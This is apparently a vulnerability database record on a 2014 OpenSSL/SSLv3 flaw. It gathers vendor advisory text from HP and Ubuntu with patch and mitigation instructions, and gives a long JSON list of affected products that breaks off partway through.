Access Point (JP) J9529B HP MSM410 Access Point (JP) J9589A HP MSM460 Dual Radio 802.11n AP (JP) J9590A HP MSM460 Dual Radio 802.11n AP (AM) J9591A HP MSM460 Dual Radio 802.11n AP (WW) J9616A HP MSM410 Single Radio 802.11n AP (IL) J9618A HP MSM460 Dual Radio 802.11n AP (IL) J9619A HP MSM466 Dual Radio 802.11n AP (IL) J9620A HP MSM466 Dual Radio 802.11n AP (JP) J9621A HP MSM466 Dual Radio 802.11n AP (AM) J9622A HP MSM466 Dual Radio 802.11n AP (WW) J9650A HP MSM430 Dual Radio 802.11n AP (AM) J9651A HP MSM430 Dual Radio 802.11n AP (WW) J9652A HP MSM430 Dual Radio 802.11n AP (JP) J9653A HP MSM430 Dual Radio 802.11n AP (IL) J9654A HP MSM430 Dual Radio 802.11n TAA AP J9655A HP MSM460 Dual Radio 802.11n TAA AP J9656A HP MSM466 Dual Radio 802.11n TAA AP J9715A HP E-MSM466-R Dual Radio 802.11n AP (AM) J9716A HP E-MSM466-R Dual Radio 802.11n AP (WW) J9717A HP E-MSM466-R Dual Radio 802.11n AP (JP) J9718A HP E-MSM466-R Dual Radio 802.11n AP (IL) J9693A HP MSM720 Access Controller (WW) J9694A HP MSM720 Premium Mobility Cntlr (WW) J9695A HP MSM720 TAA Access Controller J9696A HP MSM720 TAA Premium Mobility Cntlr
M220 Fixes in progress use mitigations J9798A HP M220 802.11n (AM) Access Point J9799A HP M220 802.11n (WW) Access Point
M210 Fixes in progress use mitigations JL023A HP M210 802.11n (AM) Access Point JL024A HP M210 802.11n (WW) Access Point
PS110 Fixes in progress use mitigations JL065A HP PS110 Wireless 802.11n VPN AM Router JL066A HP PS110 Wireless 802.11n VPN WW Router
HP Office Connect 1810 PK Fixes in progress use mitigations J9660A HP 1810-48G Switch
HP Office Connect 1810 P Fixes in progress use mitigations J9450A HP 1810-24G Switch J9449A HP 1810-8G Switch
HP Office Connect 1810 PL Fixes in progress use mitigations J9802A HP 1810-8G v2 Switch J9803A HP 1810-24G v2 Switch
RF Manager Fixes in progress use mitigations J9522A HP E-MSM415 RF Security Sensor J9521A HP RF Manager Controller with 50 Sensor License J9838AAE HP RF Manager for VMware 50 Sensor E-LTU
HP Office Connect 1810 PM Fixes in progress use mitigations J9800A HP 1810-8 v2 Switch J9801A HP 1810-24 v2 Switch
HP Office Connect PS1810 Fixes in progress use mitigations J9833A HP PS1810-8G Switch J9834A HP PS1810-24G Switch
Mitigation Instructions
For SSLv3 Server Functionality on Impacted Products:
Disable SSLv3 on clients and/or disable CBC ciphers on clients Use Access Control functionality to control client access
For SSLv3 Client Functionality on Impacted Products:
Go to SSL server and disable SSLv3 and/or disable CBC ciphers Use Access Control functionality to control access to servers
HISTORY Version:1 (rev.1) - 2 April 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. The HP Matrix Operating Environment v7.2.3 Update kit applicable to HP Matrix Operating Environment 7.2.x installations is available at the following location:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPID
NOTE: Please read the readme.txt file before proceeding with the installation. HP BladeSystem c-Class Onboard Administrator (OA) 4.30 and earlier.
Go to http://www.hp.com/go/oa
Select "Onboard Administrator Firmware" Select product name as ""HP BLc3000 Onboard Administrator Option" or "HP BLc7000 Onboard Administrator Option" Select the operating system from the list of choices Select Firmware version 4.40 for download Refer to the HP BladeSystem Onboard Administrator User Guide for steps to update the Onboard Administrator firmware. ============================================================================ Ubuntu Security Notice USN-2385-1 October 16, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.7
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.20
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.22
After a standard system update you need to reboot your computer to make all the necessary changes
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201410-1144", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "flex system chassis management module", "scope": null, "trust": 3.3, "vendor": "ibm", "version": null }, { "model": "flex system chassis management module", "scope": "eq", "trust": 1.8, "vendor": "ibm", "version": "1.50.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "flex system chassis management module 1.1.1", "scope": null, "trust": 1.2, "vendor": "ibm", "version": null }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zb" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "bladecenter advanced management module 3.66n", "scope": "ne", "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "bladecenter advanced management module 3.66k", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "flex system chassis management module 1.50.0", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "global console manager", "scope": "ne", "trust": 0.6, "vendor": "ibm", "version": "1.26.1.23978" }, { "model": "global console manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.4.2.15036" }, { "model": "global console manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.20.20.23447" }, { "model": "flex system chassis management module", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.50.0" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "local console manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.2.39.0" }, { "model": "local console manager", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "1.2.27.00" }, { "model": "local console manager", "scope": "ne", "trust": 0.6, "vendor": "ibm", "version": "1.2.40.00" }, { "model": "flex system chassis management module 1.40.1", "scope": null, "trust": 0.6, "vendor": "ibm", "version": null }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "nextscale n1200 enclosure fan power controller fhet23g-2.06", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "q", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.11" }, { "model": "k", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.21" }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.7.5" }, { "model": "norman shark industrial control system protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.2.3" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "flex system chassis management module 1.20.2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "connect:enterprise secure client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloudsystem enterprise software", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "insight control server provisioning", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.1" }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2" }, { "model": "j", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "project openssl 1.0.1j", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "wb", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "content analysis system software", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.1.2.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.3" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "n", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "policycenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "project openssl 1.0.0o", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "pa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "m210", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "vsr1000", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system ib6131 40gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "bladesystem c-class onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "4.40" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.2" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "switch series", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "119000" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.2" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.4" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "10.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.11" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11150-11" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "nextscale n1200 enclosure fan power controller fhet21c-2.04", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.4" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "norman shark scada protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.2.3" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "megaraid storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.03.01.00" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.23" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.1" }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "bladesystem c-class onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.22" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70000" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "r2122", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7900" }, { "model": "flex system chassis management module 1.40.2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.1" }, { "model": "infosphere master data management patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "netcool/system service monitor fp1 p14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0-" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.1" }, { "model": "flex system ib6131 40gb infiniband switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.4.1110" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.3" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "policycenter", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "9.2.10" }, { "model": "netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8886" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.10" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "office connect ps1810", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "qradar siem mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura communication manager ssp04", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "ex series network switches for ibm products pre 12.3r9", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "cacheflow", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.0" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.0.3" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "m.10", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "xcode", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1.3" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "connect:enterprise command line client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": null, "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "79000" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "aspera proxy", "scope": "ne", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "cloudsystem matrix", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "proxyav", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.4" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": 